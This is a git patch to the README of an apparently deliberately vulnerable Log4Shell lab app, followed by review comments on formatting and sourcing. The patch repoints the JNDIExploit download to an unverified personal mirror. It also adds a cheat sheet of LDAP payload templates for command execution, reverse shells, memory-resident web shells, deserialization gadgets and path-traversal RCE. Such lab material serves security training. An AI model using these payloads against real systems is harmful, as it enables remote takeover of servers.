From 42b1785385a04f28b3dc257187a1abefea4c72ad Mon Sep 17 00:00:00 2001 From: borekon Date: Mon, 12 Jun 2023 15:14:16 +0000 Subject: [PATCH] Update 'README.md' --- README.md | 57 +++++++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 55 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e2b60d1..fda0f0b 100644 --- a/README.md +++ b/README.md @@ -19,9 +19,9 @@ docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shel *Note: This is highly inspired from the original [LunaSec advisory](https://www.lunasec.io/docs/blog/log4j-zero-day/). **Run at your own risk, preferably in a VM in a sandbox environment**.* **Update (Dec 13th)**: *The JNDIExploit repository has been removed from GitHub (presumably, [not by GitHub](https://twitter.com/_mph4/status/1470343429599211528))... -[Click Here](http://web.archive.org/web/20211211031401/https://objects.githubusercontent.com/github-production-release-asset-2e65be/314785055/a6f05000-9563-11eb-9a61-aa85eca37c76?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211211%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20211211T031401Z&X-Amz-Expires=300&X-Amz-Signature=140e57e1827c6f42275aa5cb706fdff6dc6a02f69ef41e73769ea749db582ce0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=314785055&response-content-disposition=attachment%3B%20filename%3DJNDIExploit.v1.2.zip&response-content-type=application%2Foctet-stream) to Download the version cached by the Wayback Machine.* +[Click Here](https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip) to Download it -* Use [JNDIExploit](https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) to spin up a malicious LDAP server +* Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server ```bash wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip 
@@ -61,6 +61,59 @@ pwned ... ``` +## Supported LDAP queries + +All words are **case INSENSITIVE** when send to ldap server +``` +[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g. + ldap://127.0.0.1:1389/Basic/Dnslog/[domain] + ldap://127.0.0.1:1389/Basic/Command/[cmd] + ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/Basic/TomcatMemshell + ldap://127.0.0.1:1389/Basic/JettyMemshell + ldap://127.0.0.1:1389/Basic/WeblogicMemshell + ldap://127.0.0.1:1389/Basic/JBossMemshell + ldap://127.0.0.1:1389/Basic/WebsphereMemshell + ldap://127.0.0.1:1389/Basic/SpringMemshell + +[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialize/[GadgetType]/[PayloadType]/[Params], e.g. + ldap://127.0.0.1:1389/Deserialize/URLDNS/[domain] + ldap://127.0.0.1:1389/Deserialize/CommonsCollections1/Dnslog/[domain] + ldap://127.0.0.1:1389/Deserialize/CommonsCollections2/Command/[cmd] + ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils1/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/Deserialize/C3P0/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/Deserialize/Jre8u20/TomcatMemshell ---ALSO support other memshells + +[+] TomcatBypass Queries + ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain] + ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd] + ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell + ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell + +[+] GroovyBypass Queries + ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd] + ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd] + +[+] WebsphereBypass Queries + ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory] + ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain] + 
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd] + ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell + ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp +``` +### base64 trick + +You can convert from a command to base64 with this [online web](https://www.base64encode.org/) + +**Note** that the `+`sign must be encoded has %2B. The following chart shows more posibilities: +![image](https://svbtleusercontent.com/nnlmc8unyj0ibg_small.png) + + ## Reference https://www.lunasec.io/docs/blog/log4j-zero-day/
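Review bot: the replacement download link in the first hunk (`+[Click Here](https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip)`) swaps an archived copy of the upstream v1.2 release for a zip served from a personal mirror, with no checksum, so a reader has no way to confirm the archive matches the release the original text pointed at; add the SHA-256 of the zip beside the link and say where the copy was taken from. The unchanged context line `wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip` still fetches from the release URL that the preceding sentence says has been removed, so the bash block now disagrees with the new link; update or drop the wget line. The new `to Download it` also drops the closing `*` of the italic span opened at `*The JNDIExploit repository`, leaving the markdown emphasis unbalanced.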
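Review bot: the `## Supported LDAP queries` block in the second hunk does not say where the list comes from; a one-line attribution stating that it is the query syntax of the JNDIExploit LDAP server linked above (not something this app exposes) would prevent confusion, and the bare ``` fence should carry a tag such as `text` to match the `bash` fences used elsewhere in the README. Spelling in the added prose: `when send to ldap server` should read `when sent to the LDAP server`, `must be encoded has %2B` should read `as %2B`, and `posibilities` should read `possibilities`. The `+` note would also be clearer with the reason: the parameters travel inside an `ldap://` URL, so characters with special meaning in URLs must be percent-encoded. The chart is hotlinked from `svbtleusercontent.com`, a third-party host that may vanish; commit the image to the repository instead. The `online web` suggestion sends whatever is encoded to an external site, which is worth noting since the local `base64` utility does the same job offline. Finally, the hunk leaves two blank lines before `## Reference` where the original had one.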